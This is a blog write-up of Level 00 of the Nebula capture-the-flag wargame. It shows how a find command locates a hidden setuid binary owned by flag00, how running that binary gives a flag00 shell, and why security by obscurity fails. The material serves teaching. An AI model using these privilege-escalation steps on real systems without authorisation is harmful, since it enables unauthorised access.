blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 00

Problem

  1. Security by obscurity!

This is the concept of hiding something with the intention, that only users with the same knowledge can reveal the secret. But this is a hope. One buzzword that uses the same technique – although in a different context – is called backdoor. However the past has shown, that this is not a good technique in terms of security.

Exploit

Find the executable.

1
find / -executable -type f -user flag00 2>/dev/null

delivers the following list:

1
2
/bin/.../flag00
/rofs/bin/.../flag00

Two suspicious programs. Executing one of them delivers us a shell as user flag00. Afterwards one can execute getflag.

1
2
/bin/.../flag00
getflag 

Alternate solution

You can just pass the string to the command.

1
echo "getflag" | /rofs/bin/.../flag00

Lesson / How to fix

  1. The only solution is to avoid this technique completely!

Many backdoors, hidden services, non-documented open ports, storing information within other document-formats(text within pictures…) and many more have been revealed. It is bad practice in terms of security!


other levels…

00 01 02 03 04 05 06 07 08 09
10 11 12 13 14 15 16 17 18 19